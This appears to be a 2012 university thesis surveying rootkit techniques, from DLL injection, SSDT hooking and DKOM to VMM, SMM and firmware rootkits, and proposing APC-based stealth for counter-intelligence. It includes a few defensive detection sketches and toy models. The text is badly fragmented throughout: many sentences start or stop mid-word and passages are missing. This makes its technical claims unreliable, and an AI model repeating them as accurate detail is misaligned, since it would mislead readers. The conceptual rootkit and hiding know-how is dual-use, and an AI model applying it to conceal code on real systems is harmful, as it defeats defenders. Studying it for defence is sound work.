A Counter-Intelligence Method For Spying While Hiding in
by
Queen’s University
Kingston, Ontario, Canada
October 2012
large scale cyber threats exploiting consumer, corporate and government systems on
a constant basis. Regardless of the target, upon successful infiltration into a target
system an attacker will commonly deploy a backdoor to maintain persistent access
current detection methods: Trident, using a kernel-mode driver to inject payloads into
the user-mode address space of processes, and Sidewinder, moving rapidly between
Boot Record (MBR) modifications and the primary driver that enables table hooking,
kernel object manipulation, virtual memory subversion, payload injection, and
Acknowledgments
First and foremost I would like to thank my family, without whom I would not have
valued wisdom and experience. I also wish to thank all of the supporting faculty
that provided advice along the way: Dr. Ron Smith, Maj Gary Wolfman and Prof.
Sylvain Leblanc. A special thanks goes out to the large computer security community
that provided me insights throughout my research; in particular Dr. Dave Probert,
Contents
Abstract
Acknowledgments
Contents
List of Listings
Glossary
Chapter 1: Introduction
1.1 Motivation
1.2 Problem
1.3 Objective
1.4 Contributions
1.5 Summary
1.6 Organization of Thesis
Chapter 2: Background
2.1 Prior Rootkit Surveys
2.2 Ranking Criteria
2.3 Rootkit Methodologies
2.3.1 User-Mode Rootkits
2.3.2 Kernel-Mode Rootkits
2.3.3 Virtual Machine Based Rootkits
2.3.4 System Management Mode Based Rootkits
2.3.5 BIOS and Firmware Rootkits
2.4 Ranking of Rootkit Techniques
2.5 Asynchronous Procedure Calls
2.5.1 Overview
2.5.2 Rootkits Employing APC Functionality
2.6 Veni, vidi, vici: Defeating Modern Protections
2.6.1 Bootstrapping from the Master Boot Record
2.6.2 Windows Internals
2.7 Building a Forest from Trees: Putting it All Together
2.8 Summary
Bibliography
Appendix A: Windows NT Kernel Internals
A.1 Data Structures
A.1.1 Executive Process
A.1.2 Executive Thread
A.1.3 Kernel Process
A.1.4 Kernel Thread
A.1.5 Kernel Processor Control Region
A.1.6 Kernel Asynchronous Procedure Call
A.1.7 Kernel Asynchronous Procedure Call State
A.1.8 Kernel Debugger Version Data
A.1.9 Kernel Debugger Data Header
A.1.10 Kernel Debugger Data
List of Tables
List of Figures
List of Listings
code analysis.
4.14 Reverse connection to exfiltrate collected intelligence.
Glossary
(API) layer enabling the execution of routines in the context of a specific thread
asynchronously. APCs can be issued by both kernel-mode and user-mode programs.
Basic Input/Output System (BIOS) A software program that is built into the
computer hardware. It initializes and identifies the connected hardware devices
and initiates the OS bootloader. It is often referred to as the boot firmware;
however, it differs from firmware in that it is not stored in the Read-Only
Memory (ROM).
firmware Program code and data stored in ROM. It is used to define an interface
between a hardware component and software programs.
kernel The kernel consists of the core OS functionality, controlling all interactions
with memory and hardware.
Master Boot Record (MBR) The boot sector on a hard disk defining where the
OS loader is located.
gram where the resulting behaviour differs from the original control flow. This
unintended behaviour is referred to as a vulnerability.
System Management Mode (SMM) A mode that enables the management of
low-level hardware interactions, providing a completely separate memory region
this mode are not permitted to interact with memory allocated via kernel-mode,
and instead must employ system calls to interact with memory and hardware
Virtual Machine Monitor (VMM) A microkernel layer that enables the virtualization
or para-virtualization of an OS. This entails the emulation and control of
all hardware interactions, context switching, memory management operations,
Chapter 1
Introduction
We begin by outlining the motivation of this work and the problem that is currently
faced. The aim of our research, overcoming the outlined problem, is discussed, followed
by the contributions of our research. This chapter concludes with a roadmap
used throughout the remainder of our research accompanied by a breakdown of the
organization of this thesis.
1.1 Motivation
at governments, companies and individuals the ability to combat the attackers has
become increasingly complicated. There is a void in the toolset for defenders to
cessful attacks that bypass an organization’s perimeter and remain persistent to
exfiltrate the desired intelligence. Various intrusions against the Canadian
government have exposed the dangers of this type of attack. A recent example is
the espionage attacks against the Canadian Finance Department and
Treasury Board that exfiltrated sensitive information to foreign parties [2]. Attacks
such as these are not limited to Canada; they have proven to be a pervasive issue
across the entire globe. Iranian organizations have fallen prey to continued attacks
that have exposed the sophisticated frameworks used by attackers, including collection
engines, such as Duqu [3] and Flame (also known as sKyWIper) [4], capable
located and taken offline. This is a slow process, and is often only effective at providing
a minimal understanding of the threat in order to create signatures to block and more
rapidly detect future incursions. We investigate existing and novel rootkit techniques
that can be used not only for malicious purposes, but also to satisfy the requirements
of our research in providing counter-intelligence investigators with a better toolkit to
1.2 Problem
Computer system and network attacks have become commonplace, with recent attacks
outlining the potential scale and sophistication possible against government,
military and corporate networks. Attackers, whether they operate under the sanction
of a nation-state or act as a freelance mercenary, are after secret intellectual
property, operational strategies and citizen or customer data. Upon gaining access
to a target machine the attacker will often want to maintain persistent access for
extended periods of time. This could be used for cyber espionage and large quantities
architecture-specific extensions and modes in order to alter the system state as
perceived by the sysadmin or AV. They are frequently also able to locate AV software
notable in cases dealing with zombie infections, where the infected systems are part of
a large-scale distributed attack. However, when the systems contain, or have access
to, classified or sensitive material this is not always the most appropriate response.
Often it is important to analyze the behaviour of the intrusion to determine if it is a
Thus intrusions might be left in place, while limiting the information to which they
have access. The system and network activity is monitored in an attempt to track
and understand the intrusion. Such an operation supports counter-intelligence.
scale of these operations being better understood and mitigated in future endeavours
[11].
detection would allow the malware to take countermeasures. These countermeasures
may range from ceasing communication with the attacker, to communicating with an
alternate source to implicate another nation-state, or even disabling the
counter-intelligence software if possible. One of the contributions of this thesis is
showing that rootkits are just as effective for hiding the counter-intelligence
software from malware as they are for hiding malware from the sysadmins. Our approach
is based on the concept
that installing malware detection and analysis software inside a rootkit [12] enables
1.3 Objective
understand the identity and capability of the attacker, the objective of the attack and
the scale of penetration into the network being defended. Currently the toolset for
investigating malicious intrusions is lacking, and largely remains in the static analysis
domain. By designing a framework to better interface with the malicious threat via
dynamic analysis, defenders can compile information about the attacker more rapidly
the malicious threat, and perform host-based anomaly detection to identify suspicious
activity. This will support future defensive counter-intelligence operations in which
we are interested in understanding the identity and capability of the attacker as well
as the scale and objective of the attack.
1.4 Contributions
To accomplish the objective of this research we must fully understand the internal
• The design and testing of novel stealth techniques utilizing Asynchronous Procedure
Calls for Windows NT-based kernels to help interface with the threat
while allowing covert exfiltration of collected intelligence. This includes the
nique. The two separate techniques developed utilizing APC injection include:
• An analysis of the various payloads that can be utilized via the explored techniques
including: anomaly-based detection tools, covert channels, and dynamic
analysis modules.
1.5 Summary
In this chapter we have outlined the requirement for better techniques to deal with
the current threats plaguing cyberspace. We are primarily interested in advanced
networks. It is important both to mitigate the extent of the attack and to understand
the attacker’s identity and capability as well as the scale and objective of
the attack.
In order to approach this problem we must employ an amalgamation of existing
and novel techniques to evade foreign threats while enabling active intelligence collec-
We proceed in the next chapter by introducing the subject of rootkits, the varying
levels at which they exist, and the factors that have led to the specific design constraints
of our framework. We also discuss the reverse engineered data structures and kernel
functionality we utilize and provide a brief overview of APCs. Chapter 3 provides an
Chapter 2
Background
This chapter outlines the different rootkit techniques that have developed over the
years, presenting the factors influencing these technologies that affect the choices
various rootkit techniques, beginning with rootkits operating in the OS’s user-mode
and kernel-mode and descending beneath the OS, looking at rootkits exploiting the
Virtual Machine Monitor (VMM) layer, the System Management Mode (SMM), and
the Basic Input/Output System (BIOS) and firmware. With this broad overview
of rootkits we apply our ranking criteria to narrow the focus of our research to the
dows NT-based family of OS, performing the execution of code in the context of
a particular thread asynchronously. Related work employing APC techniques similar
to those discussed throughout this thesis is also examined. This
demonstrates the potential capabilities of APCs.
2.1. PRIOR ROOTKIT SURVEYS 10
the use of Master Boot Record bootstrapping, and hooking into undocumented
functionality through the reversing of non-exported data types and functions.
We conclude with a discussion of how the examined capabilities enable the
development of our framework. This provides a roadmap for the remainder of this
thesis.
niques; however, these studies tend to focus on only one factor. Much of
the research only focuses on the stealth capability of rootkit techniques [13, 14] and
may include an analysis of the detection mechanisms that can be employed against
these techniques [15, 16]. The literature review performed in this chapter maintains
the traditional idea of stealth capability in rootkits, but it also extends this idea with
the consideration of additional areas affecting counter-intelligence work in order to
understand the best technique to not only hide but also monitor and communicate.
Other research has also looked at the impact rootkits have when digital forensics
is used on an infected machine, and the difficulties they can induce [17, 18]. These
studies often only consider data manipulation performed by the rootkits, and are
based on offline investigations as they are rarely concerned with the same set of
objectives outlined by [9] that counter-intelligence work must recognize.
2.2. RANKING CRITERIA 11
ations. This investigation was performed by Alexander et al. [19] to evaluate each of
the techniques based on three separate classifiers:
• Semantic Gap: The level of abstraction faced by the rootkit. This problem is
caused by the loss of abstraction faced when operating beneath the OS-level
[20]. The lower the level a rootkit operates at, the more difficult it is to view
high-level data.
[Figure 2.1 (image not recovered). Surviving labels: User-Mode, Kernel-Mode, OS Abstractions, HW Abstractions, Physical Device, Highest Privilege Level]
Rootkits have significantly evolved from their initial designs. This section discusses
each stage of evolution in rootkit operation, beginning with a discussion of the
earliest versions based on user-mode. The discussion progresses through the various
privilege levels, as described in Figure 2.1, ultimately reaching the highest level at
BIOS/Firmware implementations. An overview of the computer architecture discussed
throughout this section is also shown in Figure 2.1 in order to contrast the
different components that the discussed rootkits exploit with their associated privilege
levels.
2.3. ROOTKIT METHODOLOGIES 13
The original technique used by attackers for persistent covert operations on a target
system is the user-mode, or application-layer, rootkit. These operate at the lowest
privilege level on a target system, referred to as Ring 3 as displayed in Figure 2.1.
User-mode rootkits accomplish their goals using techniques such as replacing a
rects API calls through the rootkit’s code in order to return modified results [21],
which is accomplished via remote thread creation or registry manipulation. These
cases modify user-mode system applications used by a sysadmin, providing him with
an altered, bogus view of the system state, hiding the attacker’s activities.
Various user-mode rootkits exploit API hooking through the use of DLL hooks. One
such example is the Vanquish rootkit, which is capable of redirecting Windows
API calls in order to hide files, folders and registry entries. This is accomplished by
injecting a malicious DLL into a target process to act as an intermediary for API calls,
intercepting and filtering requests for files, folders or registry entries [22]. This
technique is easily detected with modern AV solutions.
altering the contents of the registry key containing the libraries loaded when a
user-mode application initializes, specific DLLs can be loaded into every user-mode
application running as the current user [23]. This occurs when user-mode applications call
LoadLibrary to initialize the user32.dll library, a core Windows library that provides
functionality for everything from user interface object creation and management
to clipboard data transfers. Every user-mode application utilizes this library. The
USER library consequently refers to the modified registry key allowing the malicious
DLL to be loaded.
Another method of manipulating Windows API calls is via the Import Address Table
(IAT). The IAT provides a lookup table for executables when they require a
function that is located outside of the process’ address space. In order to modify
as the LoadLibrary function to inject a specified DLL into the target process via the
newly created thread [24].
accessible process on the OS in order to hook the Windows API functions and redirect
the calls through the rootkit’s code [25]. This technique is also susceptible to modern
AV detection.
User-mode rootkits provide the first traditional means of hiding, but their stealth
capabilities are exceedingly limited. They rely on a privilege level well below any
traditional AV solution, as is noticeable in Figure 2.1, and are thus much more liable
to be detected as their methods have been known for well over a decade. They do
not provide an effective means of data exfiltration with the outside world; all of their
communications rely on traversing the kernel and are easily detected. Finally, they
only provide a minimal overview of the target OS, as they are only privileged to
manipulate data accessible to the user they run as. This makes their view of the OS
limited, but still provides some insight into the system allowing them to rank well in
terms of the semantic gap problem.
forced to make this same move. This led to kernel-mode, or Ring 0, rootkits that
operate with the same privilege as the OS kernel and new AV solutions. Kernel-mode
rootkits use a variety of techniques to subvert the OS kernel and AV solutions. These
techniques range from hooking major system tables or APIs and patching system
Hooking Tables
Modern OSs contain numerous tables used to perform lookups for different purposes,
altering memory mappings in a target OS. These can include the Global Descriptor
Table (GDT) and Local Descriptor Table (LDT) on the Intel-based x86 architecture.
OSs also contain wide varieties of tables to provide particular functionality, such as
the Page Directory and Interrupt Descriptor Table (IDT) on Windows NT-based OS
[7]. The GDT and LDT are used across all flavours of OSs that operate on the x86
architecture, including Windows NT and UNIX. The GDT, LDT and Page Directory
tables are all used to handle virtual-to-physical memory mappings whereas the IDT
the flow of I/O requests, thereby altering the contents of the requests [26].
Another important table that can be used for rootkit purposes in Windows NT-based
OS is the System Service Dispatch Table (SSDT) which is used throughout
capability to hide processes, handles, modules, files, folders, registry values, services
and sockets [28]. Techniques utilizing SSDT hooking exist across other OS variants
as well, such as the Adore BSD 0.34 rootkit that infects both Linux and BSD systems
by overwriting various syscalls in the dispatch table in order to hide files, processes
and network connections [29].
another technique that touches on a lower level also exists. If we wish to alter the
results of a given call, assuming we have the specific address of where the routine
resides, then direct modification of the machine code can be performed. This allows
Two similar techniques employing this idea include routine detouring and binary
patching. They are similar in their methods of altering the procedural representation
of machine code, but differ in their final representations. Routine detouring overwrites
a code segment with jump sequences either at the beginning (prolog detouring) or
end (epilog detouring) of the target routine [7], thereby maintaining the original size,
but not checksum, of the altered routine. The overwritten sequence is replicated at
the appropriate location in the malicious code segment to ensure the routine operates
as expected. An early rootkit that used this method is Greg Hoglund’s rootkit that
patches a detour into the Windows NT kernel to modify the SeAccessCheck routine
[30] thereby removing all restrictions [31]. Hoglund’s binary detour is only 4 bytes
in size, but is able to defeat the security protections implemented in the NT kernel.
This technique builds from earlier work by +ORC in cracking software protection
often replacing system drivers or files altogether. This is often exploited by
manipulating the boot process, i.e. Master Boot Record (MBR) and Basic Input/Output
System (BIOS), prior to the OS initializing. One such example is the Vbootkit that
uses this technique to create custom boot sector code in order to subvert the Windows
Vista security mechanisms [33].
This is an effective technique, but it requires exact knowledge of the target system
including: kernel versions, service packs and hot patches. It can also be trivial to
detect using common AV techniques; namely computing checksums of kernel routines.
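The checksum comparison mentioned above can be illustrated with a small, detection-side sketch. It is a toy model only: the routine names and byte strings are hypothetical placeholders rather than real kernel code, and SHA-256 is an assumed choice of digest. It shows why a detour that preserves a routine's size still changes its checksum.

```python
import hashlib


def routine_digest(code: bytes) -> str:
    """Return a SHA-256 digest of a routine's bytes (digest choice is an assumption)."""
    return hashlib.sha256(code).hexdigest()


def find_modified(baseline: dict, current: dict) -> list:
    """List routines whose current bytes no longer match the recorded baseline digest."""
    return sorted(
        name for name, code in current.items()
        if baseline.get(name) != routine_digest(code)
    )


# Hypothetical routine bodies; placeholders, not real kernel routines.
clean = {
    "RoutineA": bytes.fromhex("5589e583ec10c9c3"),
    "RoutineB": bytes.fromhex("31c0c3"),
}
baseline = {name: routine_digest(code) for name, code in clean.items()}

# Simulate a prolog detour: the first five bytes are overwritten in place,
# so the routine keeps its original size but not its checksum.
patched = dict(clean)
patched["RoutineA"] = b"\xe9\x00\x10\x00\x00" + clean["RoutineA"][5:]

print(find_modified(baseline, clean))
print(find_modified(baseline, patched))
```

The baseline must be captured from a known-good image; a baseline taken after a patch is in place would simply record the patched bytes as clean.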
for malicious purposes. A prime example of this is the FU rootkit that hides by
manipulating the executive process (EPROCESS) structure’s doubly-linked list pointers
to redirect around the malicious processes and drivers so they cannot be located with
traditional means [34]. It is also able to manipulate the properties of processes in
order to change attributes such as privileges. DKOM originated from a similar rootkit
developed for Linux called the SucKIT rootkit [35] that performs binary patching of
kernel objects in an analogous fashion.
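To make the list-pointer manipulation concrete from a defender's point of view, the following toy model uses an ordinary Python doubly-linked list. It is a sketch under stated assumptions: the `Proc` class, its `flink`/`blink` fields, and the second "scheduler view" are illustrative inventions and do not reflect the real EPROCESS layout. It shows why a list walk misses an unlinked entry, and how comparing two independent views exposes it.

```python
class Proc:
    """Toy stand-in for a process entry; not the real EPROCESS structure."""

    def __init__(self, pid, name):
        self.pid, self.name = pid, name
        self.flink = self.blink = self  # circular list containing only itself


def link_tail(head, node):
    """Append node to the circular doubly-linked list anchored at head."""
    tail = head.blink
    tail.flink, node.blink = node, tail
    node.flink, head.blink = head, node


def unlink(node):
    """Redirect the neighbours' pointers around node, as a DKOM-style edit would."""
    node.blink.flink = node.flink
    node.flink.blink = node.blink
    node.flink = node.blink = node


def walk(head):
    """Enumerate PIDs the way a list-walking tool would see them."""
    pids, cur = [], head.flink
    while cur is not head:
        pids.append(cur.pid)
        cur = cur.flink
    return pids


head = Proc(0, "list-head")
procs = [Proc(4, "System"), Proc(812, "svc.exe"), Proc(1337, "hidden.exe")]
for p in procs:
    link_tail(head, p)

# Assumed second, independent bookkeeping view (e.g. what is actually scheduled).
scheduler_view = {p.pid for p in procs}

unlink(procs[2])
listed = walk(head)
hidden = sorted(scheduler_view - set(listed))
print(listed, hidden)
```

The entry remains alive and schedulable after unlinking, which is why cross-view comparison, rather than a single list walk, is the usual detection idea for this class of manipulation.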
Later work revisited the FU rootkit’s design to improve the stealth capability
with the FUTo rootkit that features the manipulation of the system thread table,
and not the associated threads, whereas the FUTo rootkit can hide both. Later work
by the FUTo developers revisited detection methods against system thread table
One additional form of rootkit demonstrates virtual memory subversion. The rootkit
is called Shadow Walker and is capable of hooking and subverting virtual memory
protections. At its core is a reversal of the Linux PaX project, a kernel patch to
better protect against security exploits allowing code execution using memory [39].
Rather than protect by providing Read/Write (R/W) memory access with no execution,
Shadow Walker provides execution with redirection of R/W in order to hide
executable code [40]. When a R/W attempt is made on the hidden code region the
returned frame is diverted to an untainted one, while allowing normal code execution
of the hidden code to continue. This is accomplished by exploiting the split Translation
Lookaside Buffer (TLB) of the x86 architecture, comprising the Instruction TLB (ITLB)
and Data TLB (DTLB), desynchronizing the two components to effectively filter
nipulations. Possible detection techniques are also discussed by Butler and Silberman
where the IDT can be checked for a hook of the page fault (0x0e) interrupt [38].
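The IDT check described above can be sketched as a simple range test. This is a toy model, not a working detector: the IDT is represented as a plain list of handler addresses, and the kernel image base, size and hooked address are hypothetical values chosen only for illustration.

```python
PAGE_FAULT_VECTOR = 0x0E  # page fault interrupt vector, as cited in the text


def handler_is_hooked(idt, vector, image_base, image_size):
    """Flag a vector whose handler address lies outside the expected kernel image."""
    addr = idt[vector]
    return not (image_base <= addr < image_base + image_size)


# Hypothetical kernel image range; real values depend on the running system.
KERNEL_BASE, KERNEL_SIZE = 0x80400000, 0x00200000

# Toy IDT with 256 entries, every handler inside the kernel image.
clean_idt = [KERNEL_BASE + 0x1000 + 0x10 * v for v in range(256)]

# Simulate a hook by pointing the page fault handler at an address outside the image.
hooked_idt = list(clean_idt)
hooked_idt[PAGE_FAULT_VECTOR] = 0xF8A01000  # hypothetical driver address

print(handler_is_hooked(clean_idt, PAGE_FAULT_VECTOR, KERNEL_BASE, KERNEL_SIZE))
print(handler_is_hooked(hooked_idt, PAGE_FAULT_VECTOR, KERNEL_BASE, KERNEL_SIZE))
```

A range test of this kind only catches handlers redirected outside the expected image; a detour patched into the original handler's own code would need the checksum style of comparison instead.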
Kernel-mode rootkits provide an ideal level of access to the target OS as they reside
within the OS’s kernel, thus completely avoiding the semantic gap problem. The
trade-off is that stealth techniques such as hooking, patching or DKOM require
in-depth knowledge of the targeted OS and are currently detectable by modern AV
software as their methods are well documented. By effectively moving lower into
the OS kernel, and developing new techniques, this trade-off can be mitigated until
the technique is detected and countermeasures are crafted. In terms of data exfiltration,
kernel-mode rootkits are very effective at hiding covert communication channels,
enabled this migration. Following the previous ring-based explanation, Virtual Machine
Based Rootkits (VMBR) operate in what is referred to as the Ring -1 layer,
as its primary purpose relies on allowing the guest OS to run with Ring 0 privileges
without affecting other guest OS at the same privilege level. The Virtual Machine
Monitor (VMM) layer is shown in Figure 2.1 encapsulating the OS while running
VMM Subversion
Joanna Rutkowska was the first to use this technology to subvert the OS one step
x86 architecture the performance overhead associated with virtualization can be
reduced significantly, making the attack vector viable for long-term persistence. Other
toolsets have exploited this technique, including the SubVirt rootkit [46] as well as
the Vitriol rootkit [45].
This research has since been furthered by academic research groups. Recent work at
the Royal Military College of Canada (RMC) has investigated VMBR technology [47],
focusing primarily on a counter-intelligence framework enabling quick reactionary
measures to espionage events once they have been detected. The novel component in
this VMBR approach is its attempt to interface with the target OS via syscall
interception using a method dubbed the System Call Observation Technique (SYCOT).
This is an attempt to deal with the issue faced by all software operating beneath
the OS-level that still requires target OS data, a problem referred to as the semantic gap
[20]. The semantic gap arises because the VMBR operates beneath the target’s
OS, and as such all abstractions provided from within the OS-level are lost and must
be reconstructed. This makes data interception from the target OS very difficult
unless we know the exact signature to look for in the target OS’s memory or hard
disk.
Work in this field has also focused on utilizing this technique to investigate malware
solutions that operate at the OS-level. The tool called Patagonix is designed to
detect covertly executing binaries in a target’s OS [12]. Its authors have also attempted
to deal with the semantic gap problem, but all solutions still remain OS-specific and
custom interfaces must be developed to interface with new versions of a particular OS
or a completely separate OS. This issue has not stopped research in the field, however,
and various AV solutions have also migrated to the VMM layer in attempts to utilize
this research in looking for anomalies in the OS. Virt-ICE is a step in this direction,
operating in the VMM-layer while hooking the INT3 (0xcc) interrupt used for
generating software interrupts with debuggers in order to bypass the anti-debugging
VMBR Overview
This technique provides a unique stealth capability and has a large following in the
academic and research communities, but has failed to gain traction outside of these
communities due to the complexity of developing stable solutions. To properly employ
a VMBR, intimate knowledge of the target’s hardware and OS is required, which
demands heavy reconnaissance and may not be possible at all depending on the actual
however provide a reliable and effective communication channel for data exfiltration
as they control all hardware interaction between the target OS and hardware devices.
oped. This move again utilized architecture-specific functionality on the x86 branch
of architectures, the System Management Mode (SMM). Prior to delving into an
explanation of the SMM it is first important to take a look at the different operating
modes available on the x86 architecture. Up until now our discussion has focused
solely on Protected Mode, but as of the SL family of Intel processors three operating
• Protected Mode: The mode in which all instructions and architecture features
are available such as virtual memory and paging. Memory protection is provided
giving rise to the privilege levels at the OS-level; i.e. kernel-mode (Ring 0) and
• Virtual 8086 Mode: This is not a separate mode in itself, rather an extension
of Protected Mode enabling direct execution of Real-address Mode to provide
ment.
As we can see, discussions of the kernel-mode and user-mode rootkits are specific to
Protected Mode. VMM-based rootkits also operate in Protected Mode in order to
provide paging. SMM provides a different avenue for rootkit infection and as such we
will provide a more in-depth discussion of this mode.
The SMM is an operating mode of the processor used to control low-level hardware
space and execution environment that cannot be accessed by the target OS [51].
The SMM resides one level of privilege higher than the virtualization layer, thereby
operating in the Ring -2 layer.
The first proof-of-concept rootkit using the SMM functionality of the Intel family of
architectures overcame the hurdles of having to find a method of injecting code into
the SMM memory region from a lower privilege level while being able to intercept
data from the target OS. This is overcome by manipulating the memory controller in
order to make the SMRAM region visible and writeable, copying the rootkit code
into the SMRAM and finally clearing the changes made to the memory controller to
make the SMRAM region invisible again [52]. Next, Interrupt Requests (IRQ) are
rerouted to the SMM rootkit code and forwarded to the CPU via the Intel Advanced
Programmable Interrupt Controller (APIC) Inter Processor Interrupt (IPI) handler
to complete the OS-level interrupt handling [52]. This enables the interception of
keystrokes, network sockets, and anything that can be intercepted in kernel-mode via
an IDT hook. This entire technique is only effective if the SMRAM Control register
SMBR Overview
SMBR possess a similar stealth capability to VMBR, but they have significantly
reduced code footprints as they do not require the same overhead as the virtualization
layer’s hypervisor. Unfortunately, they too suffer from the semantic gap issue and
must provide custom interfaces for any given target OS, thus making them difficult
to adapt for general purposes. They also rely heavily on the underlying architecture,
making their entire code base dependent on the target machine. Finally, in order to
provide an effective means of data exfiltration a proper networking stack must either
be created or manipulated in the Protected Mode operating environment.
As the race for the highest privilege level continued each layer came under
investigation, migrating even further into the innards of computer systems. This commenced
the development of rootkits that infected the BIOS and PCI device firmware in the
lowest layer of computer systems, what is commonly referred to now as Ring -3.
Initial research by eEye Digital Security presented a unique technique to inject
kernel-mode code into Windows NT-based OS via modified bootstrapping. This allowed
them both to reserve a segment of memory for the malware and to hook the
appropriate interrupts in order to alter the binaries that are loaded by the OS and
falsify the reported available memory to hide the malicious code [53]. Although this
offers an ideal bootstrap mechanism; the process used to make the OS loader as well
as various other OS components memory resident during system start-up. As such it
Firmware Manipulation
Even more recent work has led to attacks on Intel’s Active Management Technology
(AMT), a technology for remotely managing a system’s BIOS and firmware. The attacks
allow for remote injection and execution of malicious code in the AMT memory
region, enabling Direct Memory Access (DMA) into the target OS [54]. Performing
DMA using this method allows the exploration or alteration of the target OS.
This technique is significantly limited by the employment of Intel’s Virtualization
Technology for Direct I/O (VT-d), a later extension of the VT-x processor extension.
Hardware Interface
Recent work has used hardware devices to interact with a system via unintended
hardware vectors. One such example is a project at RMC with the primary focus of
exploiting unintended USB channels in order to create two-way communications with
a target system. This work uses two different unintended channels to exfiltrate data:
the keyboard LED channel which uses a combination of the Scroll Lock, Caps Lock
and Num Lock as well as the audio channel which uses waveform files to communicate
data with the target OS [55].
As we see with the wide range of attacks at the BIOS and firmware levels, these
tend to be architecture or even processor specific and cannot be reused for general
cases. This makes them costly solutions to develop, and even more costly to test,
deploy and maintain. Although they provide some of the best stealth capabilities
amongst all of the classifications, they also complicate the ability to gather intelligence
from the target OS due to the semantic gap. They can prove effective, depending
on the infection point, for data exfiltration operations. This is dependent on the
vector they infect; if the rootkit resides in the firmware of a PCI network interface
then data exfiltration is trivial, but a direct BIOS modification can prove difficult to
2.4 Ranking of Rootkit Techniques
Considering all of the possible rootkit classifications presented in Section 2.3 we can
now construct a matrix comparing the three factors outlined in Section 2.2. These
include the stealth capability of rootkits residing in each classification, the semantic
gap problem regarding how accessible data on the target OS is to the rootkit, as well
as the data exfiltration capability of the rootkit in being able to communicate with
the outside world. Table 2.1 shows the results compiled based on the observations for
each classification.
                                          Measurement
Rootkit Classification     Stealth Capability   Semantic Gap   Data Exfiltration
User-Mode Rootkit          poor                 good           poor
Kernel-Mode Rootkit        good                 very good      very good
VMBR                       very good            very poor      very good
SMBR                       very good            very poor      poor
BIOS/Firmware Rootkit      very good            very poor      good
As is clear, when we subvert deeper into the hardware the stealth capability im-
licious context. In a counter-intelligence context this isn’t the case as we are also
interested in the other criteria: the ease of access to high-level OS types and for-
its offer an ideal solution across the board, providing an effective data exfiltration
means while operating from within the kernel thereby circumventing the semantic
gap problem altogether. These are two important points that denote the kernel-mode
classification as the entry point of choice for counter-intelligence purposes. Moving
further down in the hardware requires mechanisms for dealing with the semantic gap
and data exfiltration problems, solutions that are often costly in terms of development
lifecycle timelines and the footprint of the developed solution in binary size.
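The comparison in Table 2.1 can be made concrete with a small scoring sketch. The ordinal scale (very poor = 0 through very good = 3), the equal weighting of the three criteria, and every identifier below are assumptions introduced purely for illustration; they are not part of the original survey.

```c
#include <assert.h>
#include <stddef.h>

/* Ordinal scale for the ratings used in Table 2.1 (assumed mapping). */
enum rating { VERY_POOR = 0, POOR = 1, GOOD = 2, VERY_GOOD = 3 };

struct classification {
    const char *name;
    enum rating stealth;       /* stealth capability */
    enum rating semantic_gap;  /* ease of access to OS-level data */
    enum rating exfiltration;  /* data exfiltration capability */
};

/* Rows transcribed from Table 2.1. */
const struct classification table_2_1[] = {
    { "User-Mode Rootkit",     POOR,      GOOD,      POOR      },
    { "Kernel-Mode Rootkit",   GOOD,      VERY_GOOD, VERY_GOOD },
    { "VMBR",                  VERY_GOOD, VERY_POOR, VERY_GOOD },
    { "SMBR",                  VERY_GOOD, VERY_POOR, POOR      },
    { "BIOS/Firmware Rootkit", VERY_GOOD, VERY_POOR, GOOD      },
};

#define TABLE_2_1_ROWS (sizeof table_2_1 / sizeof table_2_1[0])

/* Equal-weight sum of the three criteria (an assumed scoring rule). */
int combined_score(const struct classification *c)
{
    assert(c != NULL);
    return (int)c->stealth + (int)c->semantic_gap + (int)c->exfiltration;
}

/* Return the row with the highest combined score; the first row wins ties. */
const struct classification *best_classification(void)
{
    const struct classification *best = &table_2_1[0];
    for (size_t i = 1; i < TABLE_2_1_ROWS; i++) {
        if (combined_score(&table_2_1[i]) > combined_score(best))
            best = &table_2_1[i];
    }
    return best;
}
```

Under this assumed weighting the kernel-mode row scores highest, which matches the conclusion drawn in the text. A different weighting, for example one that counts stealth alone, would favour the lower layers instead.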
2.5 Asynchronous Procedure Calls
This section provides a brief summary of APCs as well as a survey of their current
2.5.1 Overview
System drivers, processes, threads and any other executable entity require a means
of communicating with other components. One example of this
requirement is Input and Output (I/O). Two synchronization types
exist at the core of the I/O concept: synchronicity and asynchronicity. In synchronous
I/O a program generates an I/O request and enters a wait state until a response is
received. In asynchronous I/O the program is able to continue execution after an
I/O request is generated. Once a response is received the current executional state
of the program is interrupted and the result of the I/O request is processed. This
questing program and executing within their context. This I/O completion example
outlines just one of the various roles APCs serve in Windows. They also handle pro-
cess and thread creation and destruction, timers, notifications, debugging, context
switching, error reporting, as well as a variety of other tasks [56].
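The asynchronous model described above can be illustrated with a toy user-space sketch: a completion is queued against a thread, the thread keeps working, and the completion handler only runs once the thread reaches a point where it accepts deliveries. The structures and function names are hypothetical and nothing here uses Windows interfaces; it is a conceptual model of deferred delivery rather than of the real APC machinery.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_PENDING 8

typedef void (*completion_fn)(void *context, int result);

struct pending_completion {
    completion_fn fn;   /* handler to run on delivery */
    void *context;      /* caller-supplied state */
    int result;         /* result of the simulated I/O request */
};

struct toy_thread {
    struct pending_completion queue[MAX_PENDING];
    size_t count;       /* number of queued completions */
    int work_done;      /* units of ordinary work performed */
};

/* Queue a completion for later delivery; returns 0 on success, -1 if full. */
int toy_queue_completion(struct toy_thread *t, completion_fn fn,
                         void *context, int result)
{
    assert(t != NULL && fn != NULL);
    if (t->count == MAX_PENDING)
        return -1;
    t->queue[t->count].fn = fn;
    t->queue[t->count].context = context;
    t->queue[t->count].result = result;
    t->count++;
    return 0;
}

/* Ordinary work continues while the request is outstanding. */
void toy_do_work(struct toy_thread *t)
{
    assert(t != NULL);
    t->work_done++;
}

/* Deliver queued completions in FIFO order; returns how many ran. */
size_t toy_deliver_completions(struct toy_thread *t)
{
    assert(t != NULL);
    size_t delivered = t->count;
    for (size_t i = 0; i < delivered; i++)
        t->queue[i].fn(t->queue[i].context, t->queue[i].result);
    t->count = 0;
    return delivered;
}

/* Example completion handler: stores the I/O result in an int. */
void store_result(void *context, int result)
{
    *(int *)context = result;
}
```

In the synchronous case the caller would simply block until the result is available. Here the result stays invisible to the program until toy_deliver_completions runs, which mirrors the interruption of normal execution described in the text.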
the OS—both kernel-mode and user-mode—in order to evade static detection while
offering direct access to the entire contents of the system with the ability to exfiltrate
from any point. They also avoid creating significant overhead in terms of CPU usage
and blend into the plethora of other APC activity making them difficult to detect with
dynamic techniques. These factors, when compared with the results of our survey
as presented in Section 2.4, make APCs an ideal mechanism for employment in our
research.
and threads from kernel-mode and injection of code in user-mode between other user-
mode processes and threads. The remainder of this section will discuss the current
use of APCs in deployed malware.
